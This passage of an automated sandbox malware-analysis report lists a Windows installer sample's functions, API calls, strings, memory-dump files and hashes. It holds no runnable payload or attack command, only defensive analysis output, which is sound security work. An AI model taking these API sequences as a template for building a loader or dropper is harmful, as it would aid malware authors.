                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450882220.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1450819707.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1450905732.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1450962462.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: FreeGlobal
                                                          • String ID:
                                                          • API String ID: 2979337801-0
                                                          • Opcode ID: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                          • Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
                                                          • Opcode Fuzzy Hash: 2b8b4b1e7525df0b70178d99aec232a76bf74dae3dcdb19d2f86b3abb44108d8
                                                          • Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792
                                                          Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
                                                          • GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001642
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450882220.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1450819707.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1450905732.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1450962462.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
                                                          • String ID:
                                                          • API String ID: 1148316912-0
                                                          • Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                          • Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
                                                          • Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
                                                          • Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1
                                                          Function 00401CE5 Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetDlgItem.USER32(?,?), ref: 00401CEB
                                                          • GetClientRect.USER32(00000000,?), ref: 00401CF8
                                                          • LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D19
                                                          • SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D27
                                                          • DeleteObject.GDI32(00000000), ref: 00401D36
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                          • String ID:
                                                          • API String ID: 1849352358-0
                                                          • Opcode ID: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                          • Instruction ID: 421c968aeac85d0930bc76aa4bc7d64c85250730bd7c855cb2b2db6532b3540a
                                                          • Opcode Fuzzy Hash: cd135f4b73005082297d100c57be3cc5053262b6a7e6c2b6d53efd55afb7b6f5
                                                          • Instruction Fuzzy Hash: F9F0E1B2A04104BFDB01DBE4EE88DEEB7BCEB08305B104466F601F5190C674AD018B35
                                                          Function 00401BCA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C2A
                                                          • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C42
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Timeout
                                                          • String ID: !
                                                          • API String ID: 1777923405-2657877971
                                                          • Opcode ID: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                          • Instruction ID: bea79b3a0ece1bc6ad67d762bc59202c8df9b0d3ac543b92a9f7cfbf89d94624
                                                          • Opcode Fuzzy Hash: 9bf1345347551ad99251b033a374dd29c38f8ee43bbdf8c6824fc78253d04776
                                                          • Instruction Fuzzy Hash: 6B217471A44109BEDF019FB0C94AFAD7B75EF44748F20413AF502B61D1D6B8A941DB18
                                                          Function 00405993 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,00403542), ref: 00405999
                                                          • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403344,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,00403542), ref: 004059A3
                                                          • lstrcatW.KERNEL32(?,00409014), ref: 004059B5
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 00405993
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrcatlstrlen
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 2659869361-2145255484
                                                          • Opcode ID: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                          • Instruction ID: a3647a5b8e032715a8ecc0c41ac115d98c53e42c85c632df021e5d83325ae185
                                                          • Opcode Fuzzy Hash: ff6b15c2f5550a5b1ad39c2dabef59c5d9ab40b11c2ea079a8f7966cac1aab2f
                                                          • Instruction Fuzzy Hash: 74D0A731101930AAD212BB548C04DDF739CEE45301740407BF605B30A1C77C1D418BFD
                                                          Function 00401F08 Relevance: 6.1, APIs: 4, Instructions: 55memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetFileVersionInfoSizeW.VERSION(00000000,?,000000EE), ref: 00401F17
                                                          • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401F39
                                                          • GetFileVersionInfoW.VERSION(?,?,00000000,00000000), ref: 00401F50
                                                          • VerQueryValueW.VERSION(?,00409014,?,?,?,?,00000000,00000000), ref: 00401F69
                                                            • Part of subcall function 00405E8F: wsprintfW.USER32 ref: 00405E9C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                          • String ID:
                                                          • API String ID: 1404258612-0
                                                          • Opcode ID: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                          • Instruction ID: 99fd8a33424c76a20816063d32e2a6550cff77f564c1afe2c3b0238effae22d3
                                                          • Opcode Fuzzy Hash: 3b082d3ae56cd80e188a89b5e125e5232bc00da1bbd486e0c7b94093934bebb9
                                                          • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                          Function 00401E51 Relevance: 6.1, APIs: 4, Instructions: 52synchronizationCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                            • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                            • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                            • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsk172E.tmp\System.dll), ref: 0040525F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                            • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                            • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                            • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                          • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                          • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                          • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                          • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                          • String ID:
                                                          • API String ID: 3585118688-0
                                                          • Opcode ID: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                          • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                          • Opcode Fuzzy Hash: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                          • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                          Function 00405166 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • IsWindowVisible.USER32(?), ref: 00405195
                                                          • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                            • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Window$CallMessageProcSendVisible
                                                          • String ID:
                                                          • API String ID: 3748168415-3916222277
                                                          • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                          • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                          • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                          • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                          Function 004056C3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                          • CloseHandle.KERNEL32(?), ref: 004056F5
                                                          Strings
                                                          • Error launching installer, xrefs: 004056D6
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CloseCreateHandleProcess
                                                          • String ID: Error launching installer
                                                          • API String ID: 3712363035-66219284
                                                          • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                          • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                          • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                          • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                          Function 0040388A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,774D2EE0,00403861,774D3420,0040366C,?), ref: 004038A4
                                                          • GlobalFree.KERNEL32(?), ref: 004038AB
                                                          Strings
                                                          • C:\Users\user\AppData\Local\Temp\, xrefs: 0040389C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Free$GlobalLibrary
                                                          • String ID: C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 1100898210-2145255484
                                                          • Opcode ID: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                          • Instruction ID: 78adfbc6f23a2b3c20b59446217b09faef23a1eee4c9d5cf742f1d2697954a66
                                                          • Opcode Fuzzy Hash: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                          • Instruction Fuzzy Hash: 2FE08C339041205BC621AF25AC08B1AB7A86F89B32F0581B6F9807B2A183746C624BD9
                                                          Function 004059DF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fTSt7dc60O.exe,C:\Users\user\Desktop\fTSt7dc60O.exe,80000000,00000003), ref: 004059E5
                                                          • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\fTSt7dc60O.exe,C:\Users\user\Desktop\fTSt7dc60O.exe,80000000,00000003), ref: 004059F5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CharPrevlstrlen
                                                          • String ID: C:\Users\user\Desktop
                                                          • API String ID: 2709904686-3080008178
                                                          • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                          • Instruction ID: c27c0225baf4744af390cb43684771b46df34b65c4403afa93d532b781e968ba
                                                          • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                          • Instruction Fuzzy Hash: A8D05EB3400920DAD3226B04DC0199F73ACEF1131074644AAF501A21A5DB785D808BBD
                                                          Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                          • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                          • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                          • GlobalFree.KERNEL32(?), ref: 10001203
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450882220.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1450819707.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1450905732.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1450962462.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                          Function 00405B19 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                          • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                          • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                          • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
